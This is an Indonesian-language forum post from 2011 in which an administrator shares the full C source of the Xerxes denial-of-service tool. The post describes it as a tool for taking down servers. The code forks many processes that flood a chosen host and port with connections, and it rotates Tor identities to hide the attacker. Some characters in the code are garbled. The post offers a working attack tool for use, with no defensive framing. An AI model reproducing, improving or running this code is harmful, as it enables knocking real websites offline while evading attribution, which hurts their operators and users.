satria | Date: Friday, 2011-08-05, 8:40 AM | Message # 1 |
Lieutenant colonel
Group: Administrators
Messages: 126
Status: Offline
| By Wan Madehope Berikut ini adalah source code Xerxes DOS (DDOS Tools) yang digunakan untuk melakukan DOS terhadap server-server. Digunakan oleh The Jester untuk takedown situs-situs, langsung aja ini source codenya: /* XerXe...s – Most powerful dos tool – THN (http://pastebin.com/aWZMbjSU) */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> #include <unistd.h> #include <netdb.h> #include <signal.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <arpa/inet.h> int make_socket(char *host, char *port) { struct addrinfo hints, *servinfo, *p; int sock, r; // fprintf(stderr, “[Connecting -> %s:%s\n", host, port); memset(&hints, 0, sizeof(hints)); hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_STREAM; if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) { fprintf(stderr, "getaddrinfo: %s\n", gai_strerror®); exit(0); } for(p = servinfo; p != NULL; p = p->ai_next) { if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) { continue; } if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) { close(sock); continue; } break; } if(p == NULL) { if(servinfo) freeaddrinfo(servinfo); fprintf(stderr, "No connection could be made\n"); exit(0); } if(servinfo) freeaddrinfo(servinfo); fprintf(stderr, "[Connected -> %s:%s]\n”, host, port); return sock; } void broke(int s) { // do nothing } #define CONNECTIONS 8 #define THREADS 48 void attack(char *host, char *port, int id) { int sockets[CONNECTIONS]; int x, g=1, r; for(x=0; x!= CONNECTIONS; x++) sockets[x]=0; signal(SIGPIPE, &broke); while(1) { for(x=0; x != CONNECTIONS; x++) { if(sockets[x] == 0) sockets[x] = make_socket(host, port); r=write(sockets[x], “\0″, 1); if(r == -1) { close(sockets[x]); sockets[x] = make_socket(host, port); } else // fprintf(stderr, “Socket[%i->%i] -> %i\n”, x, sockets[x], r); fprintf(stderr, “[%i: Voly Sent]\n”, id); } fprintf(stderr, “[%i: Voly Sent]\n”, id); usleep(300000); } } void cycle_identity() { int r; int socket = make_socket(“localhost”, “9050″); write(socket, “AUTHENTICATE \”\”\n”, 16); while(1) { r=write(socket, “signal NEWNYM\n\x00″, 16); fprintf(stderr, “[%i: cycle_identity -> signal NEWNYM\n", r); usleep(300000); } } int main(int argc, char **argv) { int x; if(argc !=3) cycle_identity(); for(x=0; x != THREADS; x++) { if(fork()) attack(argv[1], argv[2], x); usleep(200000); } getc(stdin); return 0; } Copyright Binus Hacker
|
|
| |